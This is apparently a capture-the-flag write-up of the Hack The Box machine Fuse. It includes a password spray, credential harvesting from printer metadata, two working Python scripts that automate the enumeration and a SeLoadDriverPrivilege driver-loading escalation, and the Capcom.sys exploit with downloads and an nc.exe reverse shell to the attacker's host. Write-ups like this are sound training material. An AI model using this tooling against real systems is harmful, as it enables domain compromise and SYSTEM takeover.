As with any box, I started Fuse with several portscans.
root@kalivm:~/Fuse# nmap -oN fullscan-A -A 10.10.10.193
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 11:49 CEST
Nmap scan report for 10.10.10.193 (10.10.10.193)
Host is up (0.065s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-19 10:07:06Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=6/20%Time=5EEDC88B%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607
Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h37m01s, deviation: 4h02m39s, median: 16m55s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2020-06-19T03:07:43-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-06-19T10:07:42
|_  start_date: 2020-06-19T10:06:51

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   14.40 ms  10.10.14.1 (10.10.14.1)
2   ... 21
22  897.73 ms 10.10.14.1 (10.10.14.1)
23  897.48 ms 10.10.14.1 (10.10.14.1)
24  897.31 ms 10.10.14.1 (10.10.14.1)
25  897.08 ms 10.10.14.1 (10.10.14.1)
26  ... 30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.11 seconds
A standard Windows domain controller setup: DNS, Kerberos, LDAP and SMB, but also port 80 for a web server. Note that SMB message signing is reported as required, which rules out NTLM relay against this host. The usual options (enum4linux, ldapsearch) did not give me anything useful yet, so I took a look at the website, which turned out to be quite useful.
At first, when opening the IP address in my browser, it immediately redirected to fuse.fabricorp.local. Since I did not have that entry in my hosts file yet, a page-not-found error occurred.
After putting the hostname and IP address combination in /etc/hosts, the page did resolve and showed a PaperCut Print Logger. Print servers are usually a goldmine of information, so it was time to see whether the CTF creator had replicated that experience.
The creator did a pretty good job: a nice set of usernames, plus one reference to a possible password, all nicely exportable to CSV files. After putting the usernames in a users file and Fabricorp01 as potential password in a passwords file, I used Metasploit's smb_login scanner to check whether any username/password combination worked. Spraying a single password across all users like this keeps every account at one failed attempt, which stays well below any sensible lockout threshold.
root@kalivm:~/Fuse# msfconsole
---snip---
msf5 > search smb_login

Matching Modules
================

   #  Name                             Disclosure Date  Rank    Check  Description
   -  ----                             ---------------  ----    -----  -----------
   0  auxiliary/scanner/smb/smb_login                   normal  No     SMB Login Check Scanner

msf5 > use 0
msf5 auxiliary(scanner/smb/smb_login) > set user_file users
user_file => users
msf5 auxiliary(scanner/smb/smb_login) > set pass_file passwords
pass_file => passwords
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.193
rhosts => 10.10.10.193
msf5 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.193:445 - 10.10.10.193:445 - Starting SMB login bruteforce
[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: '.\bnielson:Fabricorp01'
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\sthompson:Fabricorp01',
[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: '.\tlavel:Fabricorp01'
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\pmerton:Fabricorp01',
[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: '.\bhult:Fabricorp01'
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\administrator:Fabricorp01',
[*] 10.10.10.193:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
This appeared to be the right approach, as I now had at least three accounts I could use: bnielson, tlavel and bhult.
root@kalivm:~/Fuse# smbclient -U bnielson -L 10.10.10.193
Enter WORKGROUP\bnielson's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
However, for each of these users I got an NT_STATUS_PASSWORD_MUST_CHANGE error, which refused the login. smb_login still reports these as successes because the server confirmed the password is correct; the accounts are simply flagged to change their password at next logon.
After a short search on how to change a Windows domain password from a Linux machine, I found that smbpasswd can do this, and it works even for accounts in the must-change state.
root@kalivm:~/Fuse# smbpasswd -r 10.10.10.193 bnielson
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user bnielson on 10.10.10.193.
So there I changed the password from Fabricorp01 to Fabricorp011, and it appeared successful.
root@kalivm:~/Fuse# smbclient -U bnielson -L 10.10.10.193
Enter WORKGROUP\bnielson's password:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	HP-MFT01        Printer   HP-MFT01
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	print$          Disk      Printer Drivers
	prnproc$        Disk      Printer Drivers
	SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available
After a quick check it was successful indeed, but after a minute or so the account was back in the 'password must change' state with the old password. Apparently a script runs that resets the password so that other people on HTB can exploit the machine as well: a good thing, but quite annoying, because every step has to happen within that window. After some searching around I got kinda stuck and asked on Discord for a quick nudge, where someone pointed me to RPC as a protocol. Since port 135 is open, this should have been obvious, but to me it wasn't (yet). (Strictly speaking, rpcclient reaches the MS-RPC interfaces through SMB named pipes on port 445 rather than through the endpoint mapper on 135, so the SMB access already obtained is all it needs.) So I reset bnielson's password once more (I was at Fabricorp019 already) and tried rpcclient.
root@kalivm:~/Fuse# rpcclient -U bnielson 10.10.10.193
Enter WORKGROUP\bnielson's password:
rpcclient $>
That worked too! Nice, but what can I do with this? Simply typing help already gave an extensive list of commands, including several 'enum' commands. Enumeration is always key, so I started with enumdomusers to see whether there were more accounts to be found.
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]
That added dmuir, astein, mberbatov, dandrews and two svc- accounts to the list. Nice, but smb_login did not give anything more with the Fabricorp01 password. After some more enumeration commands, I got to enumprinters.
rpcclient $> enumprinters
	flags:[0x800000]
	name:[\\10.10.10.193\HP-MFT01]
	description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
	comment:
The printer description contained a scan2docs password, so I ran the smb_login check once more, this time with $fab@s3Rv1ce$1 in the passwords file and the full user list from enumdomusers in the users file.
msf5 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.193:445 - 10.10.10.193:445 - Starting SMB login bruteforce
[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: '.\svc-print:$fab@s3Rv1ce$1'
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\bnielson:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\sthompson:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\tlavel:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\pmerton:$fab@s3Rv1ce$1',
[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: '.\svc-scan:$fab@s3Rv1ce$1'
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\bhult:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\dandrews:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\mberbatov:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\astein:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\dmuir:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\administrator:$fab@s3Rv1ce$1',
[*] 10.10.10.193:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
And there I had two additional accounts, svc-print and svc-scan, both using the password from the printer description.
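The steps above (reset the expired password, enumerate over MS-RPC before the two-minute revert, and comb the printer metadata for credentials) are easy to script so that they run back to back. The following is an added example written for this write-up, not the author's tooling or anything from the box: it wraps smbpasswd and rpcclient from Samba (assumed on PATH), then parses the enumdomusers and enumprinters output with the formats shown above. The host, account and passwords are the ones from the write-up; the embedded sample outputs are copied from the rpcclient session above so the parsers can be exercised offline with --demo.

```python
r"""Reset an expired AD password with smbpasswd, then immediately pull domain
users and printer metadata over MS-RPC with rpcclient and parse both outputs.
Added example for this write-up, not the author's tooling. Assumes smbpasswd
and rpcclient (Samba) are on PATH; Fabricorp011 is a placeholder new password.
"""
import re
import subprocess
import sys

TARGET = "10.10.10.193"

# rpcclient enumdomusers prints one "user:[name] rid:[0xhex]" per account
USER_RE = re.compile(r"user:\[(?P<name>[^\]]+)\]\s+rid:\[0x(?P<rid>[0-9a-fA-F]+)\]")
# enumprinters prints name:[...] description:[...] comment:[...] per printer
FIELD_RE = re.compile(r"(?P<key>name|description|comment):\[(?P<val>[^\]]*)\]")
# anything that looks like "password: xxx" in free-text fields (stops at ) ] or space)
CRED_RE = re.compile(r"(?:password|passwd|pwd)\s*[:=]\s*([^\s\])]+)", re.IGNORECASE)

# Sample outputs copied from the rpcclient session in the write-up, for offline use.
SAMPLE_USERS = """
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]
"""
SAMPLE_PRINTERS = r"""
flags:[0x800000]
name:[\\10.10.10.193\HP-MFT01]
description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
comment:[]
"""


def smbpasswd_stdin(old: str, new: str) -> str:
    """smbpasswd -s reads the old password, the new one and its confirmation from stdin."""
    return f"{old}\n{new}\n{new}\n"


def reset_password(host: str, user: str, old: str, new: str) -> bool:
    """Change the password remotely; works for accounts in NT_STATUS_PASSWORD_MUST_CHANGE."""
    proc = subprocess.run(["smbpasswd", "-r", host, "-U", user, "-s"],
                          input=smbpasswd_stdin(old, new), text=True, capture_output=True)
    return proc.returncode == 0


def rpcclient(host: str, user: str, password: str, commands: list[str]) -> str:
    """Run rpcclient non-interactively; -c takes semicolon-separated commands."""
    proc = subprocess.run(["rpcclient", "-U", f"{user}%{password}", "-c", ";".join(commands), host],
                          text=True, capture_output=True)
    return proc.stdout


def parse_enumdomusers(text: str) -> dict[str, int]:
    """Map user name -> RID in decimal (the RID is the last component of the SID)."""
    return {m.group("name"): int(m.group("rid"), 16) for m in USER_RE.finditer(text)}


def parse_enumprinters(text: str) -> list[dict[str, str]]:
    """One dict per printer with its name, description and comment; a new name starts a printer."""
    printers, current = [], {}
    for m in FIELD_RE.finditer(text):
        if m.group("key") == "name" and current:
            printers.append(current)
            current = {}
        current[m.group("key")] = m.group("val")
    if current:
        printers.append(current)
    return printers


def find_credentials(text: str) -> list[str]:
    """Pull password-looking tokens out of free text such as printer descriptions."""
    return CRED_RE.findall(text)


def main(argv: list[str]) -> int:
    if "--demo" in argv:
        users, printers = parse_enumdomusers(SAMPLE_USERS), parse_enumprinters(SAMPLE_PRINTERS)
    else:
        user, old, new = "bnielson", "Fabricorp01", "Fabricorp011"  # values from the write-up
        if not reset_password(TARGET, user, old, new):
            print("password change failed", file=sys.stderr)
            return 1
        out = rpcclient(TARGET, user, new, ["enumdomusers", "enumprinters"])
        users, printers = parse_enumdomusers(out), parse_enumprinters(out)
    for name, rid in sorted(users.items(), key=lambda kv: kv[1]):
        print(f"{rid:5d} {name}")
    for p in printers:
        for secret in find_credentials(p.get("description", "") + " " + p.get("comment", "")):
            print(f"[!] credential in printer {p.get('name')}: {secret}")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv[1:]))
```

The decimal RIDs are worth keeping: svc-print's rid 0x450 is 1104, which is exactly the trailing component of the SID that whoami reports for that account later in the write-up, a cheap way to confirm you are looking at the same principal. Feeding the parsed user names straight back into a users file for smb_login is the loop the write-up performs by hand.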
root@kalivm:~/Fuse# evil-winrm -u svc-print -i 10.10.10.193
Enter Password:

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

PS C:\Users\svc-print\Documents>
After some trial and error on various services, I found that the svc-print account also has access through WinRM. Perhaps this finally provides me with the user flag.
PS C:\Users\svc-print\Documents> cd ../Desktop
PS C:\Users\svc-print\Desktop> type user.txt
2edea93<NOFLAG>e4898c8621d2ed02d
And there's the user flag; time for privilege escalation.
After obtaining the flag, I started browsing around the system but did not find much useful information at first. The usual privilege escalation checks did not lead to anything exploitable, and the only thing that looked worthwhile was a readme.txt file in the root of the system drive.
PS C:\> cat readme.txt
// MFT printing format issue
note to HP engineer:
The "test" directory has been created. For repeated tests while diagnosing this issue, the same folder should be used.
This is a production environment and the "solution" should be developed and confirmed working in your testbed
All changes will be reverted every 2 mins.
So apparently there is something to do with printer issues, and C:\test is a writable working directory that gets wiped every two minutes. However, I got kinda stuck at this point, until someone on Discord nudged me to look closely at the output of whoami /all.
PS C:\test> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== ==============================================
fabricorp\svc-print S-1-5-21-2633719317-1471316042-3957863514-1104

---snip---

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
At first the output did not look all that useful, until I compared it to the output on another Windows box. It turned out that the svc-print account holds SeLoadDriverPrivilege, which a normal domain user does not have. The first Google hit for exploiting this privilege was a blog post by Tarlogic. That post links both the EOPLoadDriver.exe tool and the Capcom driver exploit, which required compiling some C++ code. As I had not done that in a very long time (13+ years), I was kinda lost in the Visual Studio interface.
After watching some YouTube videos and reading some docs, I finally managed to get EOPLoadDriver.exe compiled. One of the most frustrating discoveries was that if you reuse existing code, Visual Studio completely ignores the files in the project and only looks for its includes (such as stdafx.h) in the location of the original .cpp file.
I also analyzed the Capcom exploit and noticed that it spawns a cmd window on the target. As I would not have an RDP login to the machine, this would make the exploit rather useless, so I looked for alternative ways to use it. During that research I was also nudged towards the GitHub page for the original Capcom.sys exploit driver.
I modified the command line so that it calls nc.exe and sends a reverse shell back to my own system, and changed the CreateProcess call to use CREATE_NO_WINDOW so that no command box is spawned. I compiled that into another .exe as well and transferred all files to my Kali machine.
PS C:\test> powershell iwr -uri http://10.10.14.2:8000/EOPL.exe -outfile EOPL.exe
PS C:\test> powershell iwr -uri http://10.10.14.2:8000/Capcom.sys -outfile capcom.sys
PS C:\test> powershell iwr -uri http://10.10.14.2:8000/ExploitCapcom.exe -outfile capcom.exe
PS C:\test> powershell IWR -uri http://10.10.14.2:8000/windows/nc.exe -outfile c:\windows\temp\nc.exe
I transferred all files to the target system. Knowing that the test directory could be used, I stored everything there except nc.exe, which went to C:\Windows\Temp.
PS C:\test> ./EOPL.exe System\CurrentControlSet\MyService c:\test\capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: 00000000, WinError: 0
I ran EOPL.exe with the capcom.sys file and, after several attempts, finally saw NTSTATUS: 00000000, meaning all had gone well. (I had seen various errors before, all of which are nicely explained by Microsoft here.) What the tool does is create the given service key under the user's own HKCU hive, which the kernel addresses as \Registry\User\<SID>\..., set its ImagePath to the driver file and its Type to a kernel driver, and then call NtLoadDriver on that path. Because the key lives in HKCU, no administrative write access to HKLM is needed; SeLoadDriverPrivilege alone is enough to get the signed but vulnerable Capcom.sys loaded.
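To make the SeLoadDriverPrivilege step concrete, here is the same technique as an added example in Python/ctypes, written for this write-up and not the author's EOPLoadDriver build or the Tarlogic code. It takes the caller's SID and the driver path on the command line (the write-up shows the SID in whoami /all; reading it from the token is left out to keep the block short), registers the driver under HKCU, enables the privilege with RtlAdjustPrivilege and calls NtLoadDriver. Only the registry/ctypes parts are Windows-only; the path builders and the NTSTATUS lookup, which explain the errors the author ran into, work anywhere. The service key name MyService is arbitrary.

```python
r"""SeLoadDriverPrivilege abuse: register a driver service under the user's own
HKCU hive (\Registry\User\<SID>\...) and load it with NtLoadDriver.
Added example for this write-up, not the author's tool. Windows-only; run as
the account that holds the privilege. The SID and driver path are arguments.
"""
import ctypes
import sys

SE_LOAD_DRIVER_PRIVILEGE = 10          # LUID of SeLoadDriverPrivilege (ntddk.h)
SERVICE_KEY = r"System\CurrentControlSet\MyService"   # arbitrary key name

# NTSTATUS values NtLoadDriver commonly returns in this scenario
NTSTATUS_NAMES = {
    0x00000000: "STATUS_SUCCESS",
    0xC0000022: "STATUS_ACCESS_DENIED",
    0xC0000034: "STATUS_OBJECT_NAME_NOT_FOUND",   # service key or ImagePath wrong
    0xC000003A: "STATUS_OBJECT_PATH_NOT_FOUND",   # ImagePath not in \??\ form
    0xC0000061: "STATUS_PRIVILEGE_NOT_HELD",      # SeLoadDriverPrivilege missing
    0xC000010E: "STATUS_IMAGE_ALREADY_LOADED",    # driver already loaded by someone
    0xC0000428: "STATUS_INVALID_IMAGE_HASH",      # signature rejected
}


class UNICODE_STRING(ctypes.Structure):
    _fields_ = [("Length", ctypes.c_ushort),
                ("MaximumLength", ctypes.c_ushort),
                ("Buffer", ctypes.c_wchar_p)]


def registry_service_path(sid: str, service_key: str = SERVICE_KEY) -> str:
    """NT-native path of a key under HKCU, which is how NtLoadDriver wants it."""
    return rf"\Registry\User\{sid}\{service_key}"


def nt_image_path(win32_path: str) -> str:
    r"""ImagePath must be an NT object path, so prefix Win32 paths with \??\."""
    return win32_path if win32_path.startswith("\\??\\") else "\\??\\" + win32_path


def describe_ntstatus(status: int) -> str:
    """Name a (possibly negative, signed) NTSTATUS; unknown codes are shown in hex."""
    code = status & 0xFFFFFFFF
    return NTSTATUS_NAMES.get(code, f"0x{code:08X}")


def register_driver(driver_path: str, service_key: str = SERVICE_KEY) -> None:
    r"""Create HKCU\<service_key> with the two values NtLoadDriver requires."""
    import winreg  # Windows-only module, hence the local import
    key = winreg.CreateKeyEx(winreg.HKEY_CURRENT_USER, service_key, 0, winreg.KEY_SET_VALUE)
    try:
        winreg.SetValueEx(key, "ImagePath", 0, winreg.REG_EXPAND_SZ, nt_image_path(driver_path))
        winreg.SetValueEx(key, "Type", 0, winreg.REG_DWORD, 1)  # SERVICE_KERNEL_DRIVER
    finally:
        winreg.CloseKey(key)


def load_driver(sid: str, service_key: str = SERVICE_KEY) -> int:
    """Enable SeLoadDriverPrivilege in our token and call NtLoadDriver; returns NTSTATUS."""
    ntdll = ctypes.WinDLL("ntdll")
    ntdll.RtlAdjustPrivilege.argtypes = [ctypes.c_ulong, ctypes.c_ubyte, ctypes.c_ubyte,
                                         ctypes.POINTER(ctypes.c_ubyte)]
    ntdll.RtlAdjustPrivilege.restype = ctypes.c_long
    ntdll.NtLoadDriver.argtypes = [ctypes.POINTER(UNICODE_STRING)]
    ntdll.NtLoadDriver.restype = ctypes.c_long

    was_enabled = ctypes.c_ubyte(0)
    status = ntdll.RtlAdjustPrivilege(SE_LOAD_DRIVER_PRIVILEGE, 1, 0, ctypes.byref(was_enabled))
    if status != 0:                    # privilege is not in the token at all
        return status

    path = registry_service_path(sid, service_key)
    name = UNICODE_STRING()
    name.Buffer = path
    name.Length = len(path) * ctypes.sizeof(ctypes.c_wchar)        # bytes, no terminator
    name.MaximumLength = name.Length + ctypes.sizeof(ctypes.c_wchar)
    return ntdll.NtLoadDriver(ctypes.byref(name))


def main(argv: list[str]) -> int:
    if len(argv) != 2:
        print("usage: load_driver.py <user SID> <C:\\path\\to\\driver.sys>")
        return 2
    sid, driver = argv
    register_driver(driver)
    status = load_driver(sid)
    print(f"NtLoadDriver({registry_service_path(sid)}) -> {describe_ntstatus(status)}")
    return 0 if status == 0 else 1


if __name__ == "__main__":
    sys.exit(main(sys.argv[1:]))
```

Two details matter more than the rest: the ImagePath has to be an NT path (\??\C:\test\capcom.sys, not the plain Win32 path), and the key is deliberately created under HKCU so that no write to HKLM\SYSTEM is needed. STATUS_IMAGE_ALREADY_LOADED on a shared box usually means another player's copy of the driver is already resident, in which case the Capcom exploit client can be run straight away.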
PS C:\test> .\capcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 000001D6EAF70008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program
I ran the exploit with a listener ready in another terminal, and as this text scrolled by, the other terminal showed this:
root@kalivm:~/Fuse# rlwrap nc -nlvp 9000
Listening on 0.0.0.0 9000
Connection received on 10.10.10.193 54788
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\test>
So now I had a shell from the exploit, but I still had to verify that the token stealing had actually worked.
PS C:\test> whoami
whoami
nt authority\system
Those are the highest privileges possible; all that is left is to obtain the flag.
PS C:\test> cd c:\Users\Administrator\Desktop
cd c:\Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> type root.txt
type root.txt
c05c1df<NOFLAG>808892ff741e42890